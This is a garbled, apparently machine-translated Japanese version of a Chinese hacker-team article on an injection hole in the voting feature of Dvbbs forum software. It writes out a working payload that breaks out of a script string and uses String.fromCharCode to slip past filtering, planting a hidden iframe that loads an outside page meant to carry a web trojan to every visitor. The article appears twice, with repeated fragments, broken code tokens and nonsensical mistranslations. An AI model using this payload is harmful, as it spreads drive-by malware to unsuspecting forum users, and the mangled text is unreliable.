新しい考えはネットの新しい抜け穴を現します。
著者:優格GXU 悪の八進制情報セキュリティチーム
文章の作者:優格[GXU] (wuzhoo.org)
情報源:邪悪八進制情報セキュリティチーム(www.eviloctal.com)
原文のダウンロード:http://www.wuzhou.org/dvbbs.doc
この間focnさんたちはネットを使う権利の抜け穴を見つけましたが、この抜け穴はめちゃくちゃに騒ぎました。ネットの掲示板にもかけられました。この抜け穴こそネットの他の穴を覆っています。ネットを動かす他の穴はあまり知られていません。
みんなが見たことがあると思います。の文章になっていますが、実はこのバグはもう半月ぐらい現れました。後になって公表されました。利用方法とは、「個人の連絡先を変更する」「個人のホームページ」にコードを書き込むことです。
MSNにコードを書き込みます。
<Script Language=JavaScript>var actionfo 3='シングルシールド'
その中の木馬。このように、私達は貼ったりレスしたりして、この招待状を訪問する人がいれば、メリーゴーランドを訪問することができます。その原理はもとのコードに対してだますので、今日主に言ったのはネットの別の掛け馬の方法です-----投票して掛け馬します。テストを通して、ネットのバージョンは全部このホールがあることが分かりました。 href="http://www.wuzhou.orgあなたのホームページのために木馬。このように、私達は貼ったりレスしたりして、この招待状を訪問する人がいれば、メリーゴーランドを訪問することができます。その原理はもとのコードに対してだますので、今日主に言ったのはネットの別の掛け馬の方法です-----投票して掛け馬します。テストを通して、ネットのバージョンは全部このホールがあることが分かりました。 target=ublank>http://www.wuzhou.orgあなたのホームページのために木馬。このように、私達は貼ったりレスしたりして、この招待状を訪問する人がいれば、メリーゴーランドを訪問することができます。その原理はもとのコードに対してだますので、今日主に言ったのはネットの別の掛け馬の方法です-----投票して掛け馬します。テストを通して、ネットのバージョンは全部このホールがあることが分かりました。
まず、投票を発表してみます。図1のように
ソースファイルを見てみます。
<Script Language=JavaScript>var vote='ssssss'var voteum='0'var votetype='0';var voters='0'、
その中でssssssssは私達が自由に書き込めました。ソースファイルを騙して、コードを実行させてもいいですか?たとえば、括弧を一つとします。()内に書いて、()と(を入れると、二つの括弧になります。道理は同じです。コードを騙してもいいです。私たちは発表投票に書き込みます。
';var voteum='0'var votetype='0';var voters='0'、var vote='
ちなみに、動画サイトの投票機能は厳密にフィルタリングされていません。書き込みの投票項目がウェブページのコードである場合、コードはそのまま実行されます。書き込みのコードは「1行につき投票項目は、最大10個まで」という通りではありません。投票を発表した後、ソースファイルを確認します。
<Script Language=JavaScript>var vote=''var voteum='0'var votetype='0';var voters='0'、var vote=''var voteum='0'var votetype='0';var voters='0'、
コードは実行できません。ネットでフィルタリングしました。再び考えを許して、ネットを動かして<と>だけを濾過して、+'/などの記号に対して濾過していません。再度投票します。コードを書き込みます。
';document.all.popmenu.inners HTML=document.all.popmenu.inners HTML+String.from CharCode(60)+IFRAM E frame eBorder=0 ヘight=0 margin Height=0 magin Width=0 scrolling=no src=http://www.wuzhou.org width=0'+String.from CharCode(62)+String.from CharCode(60)+'/IFRAM E'+String.from CharCode(62);var vote='1
発表後にこの駅にジャンプしました。もし私達は駅を私達のウェブページの木馬に変えるならば、そんなに1つの木馬は貼ってこのように完成しました。実はこれはネットのコードを使って騙しただけの一部分です。
後記:今は多くのプログラムの作者がコード詐欺という安全危害を見ていません。私が見ている多くのウェブサイトのプログラムはaspでもphpでも多くのプログラムがコード詐欺を行うことができます。
文章の作者:優格[GXU] (wuzhoo.org)
情報源:邪悪八進制情報セキュリティチーム(www.eviloctal.com)
原文のダウンロード:http://www.wuzhou.org/dvbbs.doc
この間focnさんたちはネットを使う権利の抜け穴を見つけましたが、この抜け穴はめちゃくちゃに騒ぎました。ネットの掲示板にもかけられました。この抜け穴こそネットの他の穴を覆っています。ネットを動かす他の穴はあまり知られていません。
みんなが見たことがあると思います。の文章になっていますが、実はこのバグはもう半月ぐらい現れました。後になって公表されました。利用方法とは、「個人の連絡先を変更する」「個人のホームページ」にコードを書き込むことです。
MSNにコードを書き込みます。
<Script Language=JavaScript>var actionfo 3='シングルシールド'
その中の木馬。このように、私達は貼ったりレスしたりして、この招待状を訪問する人がいれば、メリーゴーランドを訪問することができます。その原理はもとのコードに対してだますので、今日主に言ったのはネットの別の掛け馬の方法です-----投票して掛け馬します。テストを通して、ネットのバージョンは全部このホールがあることが分かりました。 href="http://www.wuzhou.orgあなたのホームページのために木馬。このように、私達は貼ったりレスしたりして、この招待状を訪問する人がいれば、メリーゴーランドを訪問することができます。その原理はもとのコードに対してだますので、今日主に言ったのはネットの別の掛け馬の方法です-----投票して掛け馬します。テストを通して、ネットのバージョンは全部このホールがあることが分かりました。 target=ublank>http://www.wuzhou.orgあなたのホームページのために木馬。このように、私達は貼ったりレスしたりして、この招待状を訪問する人がいれば、メリーゴーランドを訪問することができます。その原理はもとのコードに対してだますので、今日主に言ったのはネットの別の掛け馬の方法です-----投票して掛け馬します。テストを通して、ネットのバージョンは全部このホールがあることが分かりました。
まず、投票を発表してみます。図1のように
ソースファイルを見てみます。
<Script Language=JavaScript>var vote='ssssss'var voteum='0'var votetype='0';var voters='0'、
その中でssssssssは私達が自由に書き込めました。ソースファイルを騙して、コードを実行させてもいいですか?たとえば、括弧を一つとします。()内に書いて、()と(を入れると、二つの括弧になります。道理は同じです。コードを騙してもいいです。私たちは発表投票に書き込みます。
';var voteum='0'var votetype='0';var voters='0'、
ちなみに、動画サイトの投票機能は厳密にフィルタリングされていません。書き込みの投票項目がウェブページのコードである場合、コードはそのまま実行されます。書き込みのコードは「1行につき投票項目は、最大10個まで」という通りではありません。投票を発表した後、ソースファイルを確認します。
<Script Language=JavaScript>var vote=''var voteum='0'var votetype='0';var voters='0'、
コードは実行できません。ネットでフィルタリングしました。再び考えを許して、ネットを動かして<と>だけを濾過して、+'/などの記号に対して濾過していません。再度投票します。コードを書き込みます。
';document.all.popmenu.inners HTML=document.all.popmenu.inners HTML+String.from CharCode(60)+IFRAM E frame eBorder=0 ヘight=0 margin Height=0 magin Width=0 scrolling=no src=http://www.wuzhou.org width=0'+String.from CharCode(62)+String.from CharCode(60)+'/IFRAM E'+String.from CharCode(62);var vote='1
発表後にこの駅にジャンプしました。もし私達は駅を私達のウェブページの木馬に変えるならば、そんなに1つの木馬は貼ってこのように完成しました。実はこれはネットのコードを使って騙しただけの一部分です。
後記:今は多くのプログラムの作者がコード詐欺という安全危害を見ていません。私が見ている多くのウェブサイトのプログラムはaspでもphpでも多くのプログラムがコード詐欺を行うことができます。